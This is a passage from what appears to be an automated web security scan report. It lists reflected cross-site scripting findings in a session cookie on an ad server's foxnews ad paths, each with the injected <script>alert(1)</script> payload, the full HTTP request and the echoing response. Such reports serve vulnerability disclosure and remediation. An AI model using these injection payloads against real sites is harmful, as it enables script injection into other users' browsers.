<body bgcolor="#ffffff" style="margin:0;padding:0">


<div style="width:px;height:px;margin:0;border:0">


<s
...[SNIP]...
<script type="text/javascript" src="http://pixel.invitemedia.com/admeld_sync?admeld_user_id=e36a2f20-9985-4dcd-82e9-6ff0312e024e25824"><script>alert(1)</script>9bc617e1123&admeld_adprovider_id=300&admeld_call_type=js&admeld_callback=http://tag.admeld.com/match">
...[SNIP]...

1.154. http://tag.admeld.com/ad/iframe/3/foxnews/300x250/ros [meld_sess cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tag.admeld.com
Path:   /ad/iframe/3/foxnews/300x250/ros

Issue detail

The value of the meld_sess cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload de73b"><script>alert(1)</script>f2fe86a46e was submitted in the meld_sess cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /ad/iframe/3/foxnews/300x250/ros?t=1302539475029&tz=300&hu=&ht=js&hp=0&url=http%3A%2F%2Fwww.foxnews.com%2Fpolitics%2Findex.html&refer=http%3A%2F%2Fwww.foxnews.com%2Fpolitics%2Findex.html HTTP/1.1
Host: tag.admeld.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: meld_sess=e36a2f20-9985-4dcd-82e9-6ff0312e024ede73b"><script>alert(1)</script>f2fe86a46e; D41U=3dZ1qbCz91FPnjVHDJXbeA0jLtbKsNzTxEhbEx_A94nsZCfYiQf1UrA

Response

HTTP/1.1 200 OK
Server: Apache
P3P: policyref="http://tag.admeld.com/w3c/p3p.xml", CP="DEVo PSDo OUR BUS DSP ALL COR"
Pragma: no-cache
Cache-Control: no-store
Expires: Mon, 26 Jul 1997 05:00:00 GMT
X-AdMeld-Debug: eyB0eXBlOiAgICAgICAgICJtZWxkIiwgIHB1YjogICAgICAgICAgMywgIHNpdGU6ICAgICAgICAgImZveG5ld3MiLCAgYWQ6ICAgICAgICAgICA2MzA0OSwgIG5ldHdvcms6ICAgICAgIm1heHBvaW50IiwgIHNpemU6ICAgICAgICAgIjMwMHgyNTAiLCAgZnJlcTogICAgICAgICAiMS05OTkiLCAgZGVmYXVsdHM6ICAgICAiMC0wIiwgIHJlcXVlc3Q6ICAgICAgIjM2M2RjZDI2LTZhZTgtNDFiZi1iNzRmLTNhMWRmNGI5OTg3ZCIsICB1c2VyOiAgICAgICAgICJlMzZhMmYyMC05OTg1LTRkY2QtODJlOS02ZmYwMzEyZTAyNGVkZTczYiI+PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0PmYyZmU4NmE0NmUiLCAgY291bnRyeTogICAgICAiVVMiLCAgY2l0eTogICAgICAgICAiRGFsbGFzIiwgIGRtYTogICAgICAgICAgNjIzLCAgcmVnaW9uOiAgICAgICAiVFgiLCAgaXA6ICAgICAgICAgICAiMTczLjE5My4yMTQuMjQzIiwgIGRlcHRoOiAgICAgICAgMSwgIHRhcmdldDogICAgICAgInJvcyIsICBkaXY6ICAgICAgICAgICIzNjNkY2QyNi02YWU4LTQxYmYtYjc0Zi0zYTFkZjRiOTk4N2QiLCAgdXJsOiAgICAgICAgICAiaHR0cDovL3d3dy5mb3huZXdzLmNvbS9wb2xpdGljcy9pbmRleC5odG1sIiwgIGVsYXBzZWQ6ICAgICAgMCwgIGRlY2lzaW9uOiAgICAgInJlYWwtdGltZSBiaWQiLCAgaW1wOiAgICAgICAgICAxLCAgbmV0d29ya19pZDogICAyMzMsICBhY2NvdW50X2lkOiAgIDYyODksICBuZXR3b3JrX25hbWU6ICJNYXhQb2ludCBJbnRlcmFjdGl2ZSAoUlRCKSIsICBwdWJsaXNoZXJfbmFtZTogImZveG5ld3MiLCAgZWNwbTogICAgICAgICAiMS43NiIsICBmZWNwbTogICAgICAgICIxLjc2IiwgIGZpbGw6ICAgICAgICAgIjEwMC4wMCIsICBwbGFjZW1lbnQ6ICAgICJyb3MiLCAgcnVsZTogICAgICAgICAicm9zIiwgIGNyZWF0aXZlX2lkOiAgIiIsICBiaWRkZXJzOiAgICAgIFt7Im5ldHdvcmtfbmFtZSI6Ik1heFBvaW50IEludGVyYWN0aXZlIChSVEIpIiwgImJpZCI6IjMuMDEiLCJhZCI6NjMwNDksICJidXkiOjE3NiwibHAiOiJodHRwOi8vd3d3LnR5c29uLmNvbS9Db25zdW1lci9Qcm9kdWN0cy9Qcm9tb3Rpb25zL1VsdGltYXRlQ2hpY2tlblNhbmR3aWNoLmFzcHg/Y21waWQ9U2FuZHdpY2hBbnlOaWdodEdTTmV0d29yayIsImFuIjoiIiwic3RhdHVzIjoiMy4wMSIsImZpZCI6NDg5MiwgImZjcG0iOiIxLjc1In0seyJuZXR3b3JrX25hbWUiOiJNZWRpYU1hdGggKFJUQikiLCAiYmlkIjoiMC4wMCIsImFkIjoxOTcxODEsICJidXkiOjUwMywibHAiOiIiLCJhbiI6IiIsInN0YXR1cyI6Im5vIGJpZCIsImZpZCI6MCwgImZjcG0iOiIwLjAwIn0seyJuZXR3b3JrX25hbWUiOiJUdWJlbW9ndWwgKFJUQikiLCAiYmlkIjoiMC4wMCIsImFkIjo1ODk1ODA4LCAiYnV5Ijo4NDcxLCJscCI6IiIsImFuIjoiIiwic3RhdHVzIjoibm8gYmlkIiwiZmlkIjowLCAiZmNwbSI6IjAuMDAifSx7Im5ldHdvcmtfbmFtZSI6IlR1cm4gKFJUQikiLCAiYmlkIjoiMC4wMCIsImFkIjo2Mjg5NywgImJ1eSI6MTg5LCJscCI6Imh0dHA6Ly93ZWxjb21lLmhwLmNvbS9jb3VudHJ5L3VzL2VuL2NzL2hvbWVfYy5odG1sIiwiYW4iOiJIUCBEaXJlY3QiLCJzdGF0dXMiOiIwLjEyIiwiZmlkIjo0ODkyLCAiZmNwbSI6IjEuNzUifSx7Im5ldHdvcmtfbmFtZSI6IkRhdGFYdSAoUlRCKSIsICJiaWQiOiIwLjAwIiwiYWQiOjYyOTc5LCAiYnV5IjoxOTksImxwIjoiIiwiYW4iOiIiLCJzdGF0dXMiOiJubyBiaWQiLCJmaWQiOjAsICJmY3BtIjoiMC4wMCJ9XSwgIHRhcmdldGluZzogICAgIiIsICBhZHZlcnRpc2VyOiAgICAiIiwgIGxhbmRpbmdfcGFnZTogICAgImh0dHA6Ly93d3cudHlzb24uY29tL0NvbnN1bWVyL1Byb2R1Y3RzL1Byb21vdGlvbnMvVWx0aW1hdGVDaGlja2VuU2FuZHdpY2guYXNweD9jbXBpZD1TYW5kd2ljaEFueU5pZ2h0R1NOZXR3b3JrIiwgIGhvc3Q6ICAgICAgICAgIm5qLXRhZzQ0In0=
Content-Length: 1670
Content-Type: text/html
Date: Mon, 11 Apr 2011 16:31:25 GMT
Connection: close

<html>
<body bgcolor="#ffffff" style="margin:0;padding:0">


<div style="width:px;height:px;margin:0;border:0">



...[SNIP]...
0" height="0" border="0" marginwidth="0" marginheight="0" frameborder="0" src="http://r.turn.com/server/pixel.htm?fpid=4&sp=y&admeld_call_type=iframe&admeld_user_id=e36a2f20-9985-4dcd-82e9-6ff0312e024ede73b"><script>alert(1)</script>f2fe86a46e&admeld_adprovider_id=24&admeld_call_type=iframe&admeld_callback=http://tag.admeld.com/match">
...[SNIP]...

1.155. http://tag.admeld.com/ad/iframe/3/foxnews/300x250/ros [meld_sess cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tag.admeld.com
Path:   /ad/iframe/3/foxnews/300x250/ros

Issue detail

The value of the meld_sess cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 25071"><script>alert(1)</script>90866a0e48e was submitted in the meld_sess cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /ad/iframe/3/foxnews/300x250/ros?t=1302539475029&tz=300&hu=&ht=js&hp=0&url=http%3A%2F%2Fwww.foxnews.com%2Fpolitics%2Findex.html&refer=http%3A%2F%2Fwww.foxnews.com%2Fpolitics%2Findex.html HTTP/1.1
Host: tag.admeld.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: meld_sess=e36a2f20-9985-4dcd-82e9-6ff0312e024e25071"><script>alert(1)</script>90866a0e48e; D41U=3dZ1qbCz91FPnjVHDJXbeA0jLtbKsNzTxEhbEx_A94nsZCfYiQf1UrA

Response

HTTP/1.1 200 OK
Server: Apache
P3P: policyref="http://tag.admeld.com/w3c/p3p.xml", CP="DEVo PSDo OUR BUS DSP ALL COR"
Pragma: no-cache
Cache-Control: no-store
Expires: Mon, 26 Jul 1997 05:00:00 GMT
X-AdMeld-Debug: eyB0eXBlOiAgICAgICAgICJtZWxkIiwgIHB1YjogICAgICAgICAgMywgIHNpdGU6ICAgICAgICAgImZveG5ld3MiLCAgYWQ6ICAgICAgICAgICA2MzA0OSwgIG5ldHdvcms6ICAgICAgIm1heHBvaW50IiwgIHNpemU6ICAgICAgICAgIjMwMHgyNTAiLCAgZnJlcTogICAgICAgICAiMS05OTkiLCAgZGVmYXVsdHM6ICAgICAiMC0wIiwgIHJlcXVlc3Q6ICAgICAgIjdmY2UwOGI3LWIzMzctNGQ4Yi1iOGY0LWE2OTNjMTJhMmI0OSIsICB1c2VyOiAgICAgICAgICJlMzZhMmYyMC05OTg1LTRkY2QtODJlOS02ZmYwMzEyZTAyNGUyNTA3MSI+PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0PjkwODY2YTBlNDhlIiwgIGNvdW50cnk6ICAgICAgIlVTIiwgIGNpdHk6ICAgICAgICAgIkRhbGxhcyIsICBkbWE6ICAgICAgICAgIDYyMywgIHJlZ2lvbjogICAgICAgIlRYIiwgIGlwOiAgICAgICAgICAgIjE3My4xOTMuMjE0LjI0MyIsICBkZXB0aDogICAgICAgIDEsICB0YXJnZXQ6ICAgICAgICJyb3MiLCAgZGl2OiAgICAgICAgICAiN2ZjZTA4YjctYjMzNy00ZDhiLWI4ZjQtYTY5M2MxMmEyYjQ5IiwgIHVybDogICAgICAgICAgImh0dHA6Ly93d3cuZm94bmV3cy5jb20vcG9saXRpY3MvaW5kZXguaHRtbCIsICBlbGFwc2VkOiAgICAgIDAsICBkZWNpc2lvbjogICAgICJyZWFsLXRpbWUgYmlkIiwgIGltcDogICAgICAgICAgMSwgIG5ldHdvcmtfaWQ6ICAgMjMzLCAgYWNjb3VudF9pZDogICA2Mjg5LCAgbmV0d29ya19uYW1lOiAiTWF4UG9pbnQgSW50ZXJhY3RpdmUgKFJUQikiLCAgcHVibGlzaGVyX25hbWU6ICJmb3huZXdzIiwgIGVjcG06ICAgICAgICAgIjEuNzYiLCAgZmVjcG06ICAgICAgICAiMS43NiIsICBmaWxsOiAgICAgICAgICIxMDAuMDAiLCAgcGxhY2VtZW50OiAgICAicm9zIiwgIHJ1bGU6ICAgICAgICAgInJvcyIsICBjcmVhdGl2ZV9pZDogICIiLCAgYmlkZGVyczogICAgICBbeyJuZXR3b3JrX25hbWUiOiJNYXhQb2ludCBJbnRlcmFjdGl2ZSAoUlRCKSIsICJiaWQiOiIzLjAxIiwiYWQiOjYzMDQ5LCAiYnV5IjoxNzYsImxwIjoiaHR0cDovL3d3dy50eXNvbi5jb20vQ29uc3VtZXIvUHJvZHVjdHMvUHJvbW90aW9ucy9VbHRpbWF0ZUNoaWNrZW5TYW5kd2ljaC5hc3B4P2NtcGlkPVNhbmR3aWNoQW55TmlnaHRHU05ldHdvcmsiLCJhbiI6IiIsInN0YXR1cyI6IjMuMDEiLCJmaWQiOjQ4OTIsICJmY3BtIjoiMS43NSJ9LHsibmV0d29ya19uYW1lIjoiTWVkaWFNYXRoIChSVEIpIiwgImJpZCI6IjAuMDAiLCJhZCI6MTk3MTgxLCAiYnV5Ijo1MDMsImxwIjoiIiwiYW4iOiIiLCJzdGF0dXMiOiJubyBiaWQiLCJmaWQiOjAsICJmY3BtIjoiMC4wMCJ9LHsibmV0d29ya19uYW1lIjoiVHViZW1vZ3VsIChSVEIpIiwgImJpZCI6IjAuMDAiLCJhZCI6NTg5NTgwOCwgImJ1eSI6ODQ3MSwibHAiOiIiLCJhbiI6IiIsInN0YXR1cyI6Im5vIGJpZCIsImZpZCI6MCwgImZjcG0iOiIwLjAwIn0seyJuZXR3b3JrX25hbWUiOiJUdXJuIChSVEIpIiwgImJpZCI6IjAuMDAiLCJhZCI6NjI4OTcsICJidXkiOjE4OSwibHAiOiJodHRwOi8vd2VsY29tZS5ocC5jb20vY291bnRyeS91cy9lbi9jcy9ob21lX2MuaHRtbCIsImFuIjoiSFAgRGlyZWN0Iiwic3RhdHVzIjoiMC4xMiIsImZpZCI6NDg5MiwgImZjcG0iOiIxLjc1In0seyJuZXR3b3JrX25hbWUiOiJEYXRhWHUgKFJUQikiLCAiYmlkIjoiMC4wMCIsImFkIjo2Mjk3OSwgImJ1eSI6MTk5LCJscCI6IiIsImFuIjoiIiwic3RhdHVzIjoibm8gYmlkIiwiZmlkIjowLCAiZmNwbSI6IjAuMDAifV0sICB0YXJnZXRpbmc6ICAgICIiLCAgYWR2ZXJ0aXNlcjogICAgIiIsICBsYW5kaW5nX3BhZ2U6ICAgICJodHRwOi8vd3d3LnR5c29uLmNvbS9Db25zdW1lci9Qcm9kdWN0cy9Qcm9tb3Rpb25zL1VsdGltYXRlQ2hpY2tlblNhbmR3aWNoLmFzcHg/Y21waWQ9U2FuZHdpY2hBbnlOaWdodEdTTmV0d29yayIsICBob3N0OiAgICAgICAgICJuai10YWcyIn0=
Content-Length: 1674
Content-Type: text/html
Date: Mon, 11 Apr 2011 16:31:24 GMT
Connection: close

<html>
<body bgcolor="#ffffff" style="margin:0;padding:0">


<div style="width:px;height:px;margin:0;border:0">



...[SNIP]...
<script type="text/javascript" src="http://pixel.invitemedia.com/admeld_sync?admeld_user_id=e36a2f20-9985-4dcd-82e9-6ff0312e024e25071"><script>alert(1)</script>90866a0e48e&admeld_adprovider_id=300&admeld_call_type=js&admeld_callback=http://tag.admeld.com/match">
...[SNIP]...

1.156. http://tag.admeld.com/ad/iframe/3/foxnews/728x90/politics [meld_sess cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tag.admeld.com
Path:   /ad/iframe/3/foxnews/728x90/politics

Issue detail

The value of the meld_sess cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f65d4"><script>alert(1)</script>c7aac3109a7 was submitted in the meld_sess cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /ad/iframe/3/foxnews/728x90/politics?t=1302540075597&tz=300&hu=&ht=js&hp=0&url=http%3A%2F%2Fwww.foxnews.com%2Fpolitics%2Findex.html&refer=http%3A%2F%2Fwww.foxnews.com%2Fpolitics%2Findex.html HTTP/1.1
Host: tag.admeld.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: meld_sess=e36a2f20-9985-4dcd-82e9-6ff0312e024ef65d4"><script>alert(1)</script>c7aac3109a7; D41U=3dZ1qbCz91FPnjVHDJXbeA0jLtbKsNzTxEhbEx_A94nsZCfYiQf1UrA

Response

HTTP/1.1 200 OK
Server: Apache
P3P: policyref="http://tag.admeld.com/w3c/p3p.xml", CP="DEVo PSDo OUR BUS DSP ALL COR"
Pragma: no-cache
Cache-Control: no-store
Expires: Mon, 26 Jul 1997 05:00:00 GMT
X-AdMeld-Debug: eyB0eXBlOiAgICAgICAgICJtZWxkIiwgIHB1YjogICAgICAgICAgMywgIHNpdGU6ICAgICAgICAgImZveG5ld3MiLCAgYWQ6ICAgICAgICAgICA2MzA2MCwgIG5ldHdvcms6ICAgICAgIm1heHBvaW50IiwgIHNpemU6ICAgICAgICAgIjcyOHg5MCIsICBmcmVxOiAgICAgICAgICIxLTk5OSIsICBkZWZhdWx0czogICAgICIwLTAiLCAgcmVxdWVzdDogICAgICAiZjlhYjU2ZjctYzU4Ny00ODQwLWIwY2UtMTY4OGM3MTI2YTMyIiwgIHVzZXI6ICAgICAgICAgImUzNmEyZjIwLTk5ODUtNGRjZC04MmU5LTZmZjAzMTJlMDI0ZWY2NWQ0Ij48c2NyaXB0PmFsZXJ0KDEpPC9zY3JpcHQ+YzdhYWMzMTA5YTciLCAgY291bnRyeTogICAgICAiVVMiLCAgY2l0eTogICAgICAgICAiRGFsbGFzIiwgIGRtYTogICAgICAgICAgNjIzLCAgcmVnaW9uOiAgICAgICAiVFgiLCAgaXA6ICAgICAgICAgICAiMTczLjE5My4yMTQuMjQzIiwgIGRlcHRoOiAgICAgICAgMSwgIHRhcmdldDogICAgICAgInBvbGl0aWNzIiwgIGRpdjogICAgICAgICAgImY5YWI1NmY3LWM1ODctNDg0MC1iMGNlLTE2ODhjNzEyNmEzMiIsICB1cmw6ICAgICAgICAgICJodHRwOi8vd3d3LmZveG5ld3MuY29tL3BvbGl0aWNzL2luZGV4Lmh0bWwiLCAgZWxhcHNlZDogICAgICAwLCAgZGVjaXNpb246ICAgICAicmVhbC10aW1lIGJpZCIsICBpbXA6ICAgICAgICAgIDEsICBuZXR3b3JrX2lkOiAgIDIzMywgIGFjY291bnRfaWQ6ICAgNjI4OSwgIG5ldHdvcmtfbmFtZTogIk1heFBvaW50IEludGVyYWN0aXZlIChSVEIpIiwgIHB1Ymxpc2hlcl9uYW1lOiAiZm94bmV3cyIsICBlY3BtOiAgICAgICAgICIxLjc2IiwgIGZlY3BtOiAgICAgICAgIjEuNzYiLCAgZmlsbDogICAgICAgICAiMTAwLjAwIiwgIHBsYWNlbWVudDogICAgInBvbGl0aWNzIiwgIHJ1bGU6ICAgICAgICAgInBvbGl0aWNzIiwgIGNyZWF0aXZlX2lkOiAgIiIsICBiaWRkZXJzOiAgICAgIFt7Im5ldHdvcmtfbmFtZSI6Ik1heFBvaW50IEludGVyYWN0aXZlIChSVEIpIiwgImJpZCI6IjMuMDEiLCJhZCI6NjMwNjAsICJidXkiOjE3OCwibHAiOiJodHRwOi8vd3d3LnR5c29uLmNvbS9Db25zdW1lci9Qcm9kdWN0cy9Qcm9tb3Rpb25zL1VsdGltYXRlQ2hpY2tlblNhbmR3aWNoLmFzcHg/Y21waWQ9U2FuZHdpY2hBbnlOaWdodEdTTmV0d29yayIsImFuIjoiIiwic3RhdHVzIjoiMy4wMSIsImZpZCI6NDg5MiwgImZjcG0iOiIxLjc1In0seyJuZXR3b3JrX25hbWUiOiJNZWRpYU1hdGggKFJUQikiLCAiYmlkIjoiMC4wMCIsImFkIjoxOTcxODIsICJidXkiOjUwNCwibHAiOiIiLCJhbiI6IiIsInN0YXR1cyI6Im5vIGJpZCIsImZpZCI6MCwgImZjcG0iOiIwLjAwIn0seyJuZXR3b3JrX25hbWUiOiJUdXJuIChSVEIpIiwgImJpZCI6IjAuMDAiLCJhZCI6NjI4OTksICJidXkiOjE5NiwibHAiOiJodHRwOi8vd3d3LmZhY2Vib29rLmNvbS9TdXBlcjg/dj1hcHBfNjAwOTI5NDA4NiIsImFuIjoiU3VwZXIgOCIsInN0YXR1cyI6IjAuMTEiLCJmaWQiOjQ4OTIsICJmY3BtIjoiMS43NSJ9LHsibmV0d29ya19uYW1lIjoiRGF0YVh1IChSVEIpIiwgImJpZCI6IjAuMDAiLCJhZCI6NjI5ODEsICJidXkiOjIwMCwibHAiOiIiLCJhbiI6IiIsInN0YXR1cyI6Im5vIGJpZCIsImZpZCI6MCwgImZjcG0iOiIwLjAwIn1dLCAgdGFyZ2V0aW5nOiAgICAiIiwgIGFkdmVydGlzZXI6ICAgICIiLCAgbGFuZGluZ19wYWdlOiAgICAiaHR0cDovL3d3dy50eXNvbi5jb20vQ29uc3VtZXIvUHJvZHVjdHMvUHJvbW90aW9ucy9VbHRpbWF0ZUNoaWNrZW5TYW5kd2ljaC5hc3B4P2NtcGlkPVNhbmR3aWNoQW55TmlnaHRHU05ldHdvcmsiLCAgaG9zdDogICAgICAgICAibmotdGFnMTUifQ==
Content-Length: 1673
Content-Type: text/html
Date: Mon, 11 Apr 2011 16:41:22 GMT
Connection: close

<html>
<body bgcolor="#ffffff" style="margin:0;padding:0">


<div style="width:px;height:px;margin:0;border:0">



...[SNIP]...
0" height="0" border="0" marginwidth="0" marginheight="0" frameborder="0" src="http://r.turn.com/server/pixel.htm?fpid=4&sp=y&admeld_call_type=iframe&admeld_user_id=e36a2f20-9985-4dcd-82e9-6ff0312e024ef65d4"><script>alert(1)</script>c7aac3109a7&admeld_adprovider_id=24&admeld_call_type=iframe&admeld_callback=http://tag.admeld.com/match">
...[SNIP]...

1.157. http://tag.admeld.com/ad/iframe/3/foxnews/728x90/politics [meld_sess cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tag.admeld.com
Path:   /ad/iframe/3/foxnews/728x90/politics

Issue detail

The value of the meld_sess cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c3fb3"><script>alert(1)</script>4fd93403c0d was submitted in the meld_sess cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /ad/iframe/3/foxnews/728x90/politics?t=1302540075597&tz=300&hu=&ht=js&hp=0&url=http%3A%2F%2Fwww.foxnews.com%2Fpolitics%2Findex.html&refer=http%3A%2F%2Fwww.foxnews.com%2Fpolitics%2Findex.html HTTP/1.1
Host: tag.admeld.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: meld_sess=e36a2f20-9985-4dcd-82e9-6ff0312e024ec3fb3"><script>alert(1)</script>4fd93403c0d; D41U=3dZ1qbCz91FPnjVHDJXbeA0jLtbKsNzTxEhbEx_A94nsZCfYiQf1UrA

Response

HTTP/1.1 200 OK
Server: Apache
P3P: policyref="http://tag.admeld.com/w3c/p3p.xml", CP="DEVo PSDo OUR BUS DSP ALL COR"
Pragma: no-cache
Cache-Control: no-store
Expires: Mon, 26 Jul 1997 05:00:00 GMT
X-AdMeld-Debug: eyB0eXBlOiAgICAgICAgICJtZWxkIiwgIHB1YjogICAgICAgICAgMywgIHNpdGU6ICAgICAgICAgImZveG5ld3MiLCAgYWQ6ICAgICAgICAgICA2MzA2MCwgIG5ldHdvcms6ICAgICAgIm1heHBvaW50IiwgIHNpemU6ICAgICAgICAgIjcyOHg5MCIsICBmcmVxOiAgICAgICAgICIxLTk5OSIsICBkZWZhdWx0czogICAgICIwLTAiLCAgcmVxdWVzdDogICAgICAiODQyMTJhMDUtMmU0ZC00M2QxLTkxM2YtYWIxMzU3Zjg5YjgyIiwgIHVzZXI6ICAgICAgICAgImUzNmEyZjIwLTk5ODUtNGRjZC04MmU5LTZmZjAzMTJlMDI0ZWMzZmIzIj48c2NyaXB0PmFsZXJ0KDEpPC9zY3JpcHQ+NGZkOTM0MDNjMGQiLCAgY291bnRyeTogICAgICAiVVMiLCAgY2l0eTogICAgICAgICAiRGFsbGFzIiwgIGRtYTogICAgICAgICAgNjIzLCAgcmVnaW9uOiAgICAgICAiVFgiLCAgaXA6ICAgICAgICAgICAiMTczLjE5My4yMTQuMjQzIiwgIGRlcHRoOiAgICAgICAgMSwgIHRhcmdldDogICAgICAgInBvbGl0aWNzIiwgIGRpdjogICAgICAgICAgIjg0MjEyYTA1LTJlNGQtNDNkMS05MTNmLWFiMTM1N2Y4OWI4MiIsICB1cmw6ICAgICAgICAgICJodHRwOi8vd3d3LmZveG5ld3MuY29tL3BvbGl0aWNzL2luZGV4Lmh0bWwiLCAgZWxhcHNlZDogICAgICAwLCAgZGVjaXNpb246ICAgICAicmVhbC10aW1lIGJpZCIsICBpbXA6ICAgICAgICAgIDEsICBuZXR3b3JrX2lkOiAgIDIzMywgIGFjY291bnRfaWQ6ICAgNjI4OSwgIG5ldHdvcmtfbmFtZTogIk1heFBvaW50IEludGVyYWN0aXZlIChSVEIpIiwgIHB1Ymxpc2hlcl9uYW1lOiAiZm94bmV3cyIsICBlY3BtOiAgICAgICAgICIxLjc2IiwgIGZlY3BtOiAgICAgICAgIjEuNzYiLCAgZmlsbDogICAgICAgICAiMTAwLjAwIiwgIHBsYWNlbWVudDogICAgInBvbGl0aWNzIiwgIHJ1bGU6ICAgICAgICAgInBvbGl0aWNzIiwgIGNyZWF0aXZlX2lkOiAgIiIsICBiaWRkZXJzOiAgICAgIFt7Im5ldHdvcmtfbmFtZSI6Ik1heFBvaW50IEludGVyYWN0aXZlIChSVEIpIiwgImJpZCI6IjMuMDEiLCJhZCI6NjMwNjAsICJidXkiOjE3OCwibHAiOiJodHRwOi8vd3d3LnR5c29uLmNvbS9Db25zdW1lci9Qcm9kdWN0cy9Qcm9tb3Rpb25zL1VsdGltYXRlQ2hpY2tlblNhbmR3aWNoLmFzcHg/Y21waWQ9U2FuZHdpY2hBbnlOaWdodEdTTmV0d29yayIsImFuIjoiIiwic3RhdHVzIjoiMy4wMSIsImZpZCI6NDg5MiwgImZjcG0iOiIxLjc1In0seyJuZXR3b3JrX25hbWUiOiJNZWRpYU1hdGggKFJUQikiLCAiYmlkIjoiMC4wMCIsImFkIjoxOTcxODIsICJidXkiOjUwNCwibHAiOiIiLCJhbiI6IiIsInN0YXR1cyI6Im5vIGJpZCIsImZpZCI6MCwgImZjcG0iOiIwLjAwIn0seyJuZXR3b3JrX25hbWUiOiJUdXJuIChSVEIpIiwgImJpZCI6IjAuMDAiLCJhZCI6NjI4OTksICJidXkiOjE5NiwibHAiOiJodHRwOi8vd2VsY29tZS5ocC5jb20vY291bnRyeS91cy9lbi9jcy9ob21lX2MuaHRtbCIsImFuIjoiSFAgRGlyZWN0Iiwic3RhdHVzIjoiMC4xNiIsImZpZCI6NDg5MiwgImZjcG0iOiIxLjc1In0seyJuZXR3b3JrX25hbWUiOiJEYXRhWHUgKFJUQikiLCAiYmlkIjoiMC4wMCIsImFkIjo2Mjk4MSwgImJ1eSI6MjAwLCJscCI6IiIsImFuIjoiIiwic3RhdHVzIjoibm8gYmlkIiwiZmlkIjowLCAiZmNwbSI6IjAuMDAifV0sICB0YXJnZXRpbmc6ICAgICIiLCAgYWR2ZXJ0aXNlcjogICAgIiIsICBsYW5kaW5nX3BhZ2U6ICAgICJodHRwOi8vd3d3LnR5c29uLmNvbS9Db25zdW1lci9Qcm9kdWN0cy9Qcm9tb3Rpb25zL1VsdGltYXRlQ2hpY2tlblNhbmR3aWNoLmFzcHg/Y21waWQ9U2FuZHdpY2hBbnlOaWdodEdTTmV0d29yayIsICBob3N0OiAgICAgICAgICJuai10YWcxNyJ9
Content-Length: 1673
Content-Type: text/html
Date: Mon, 11 Apr 2011 16:41:21 GMT
Connection: close

<html>
<body bgcolor="#ffffff" style="margin:0;padding:0">


<div style="width:px;height:px;margin:0;border:0">



...[SNIP]...
<script type="text/javascript" src="http://pixel.invitemedia.com/admeld_sync?admeld_user_id=e36a2f20-9985-4dcd-82e9-6ff0312e024ec3fb3"><script>alert(1)</script>4fd93403c0d&admeld_adprovider_id=300&admeld_call_type=js&admeld_callback=http://tag.admeld.com/match">
...[SNIP]...

1.158. http://tag.admeld.com/ad/iframe/3/foxnews/728x90/ros [meld_sess cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tag.admeld.com
Path:   /ad/iframe/3/foxnews/728x90/ros

Issue detail

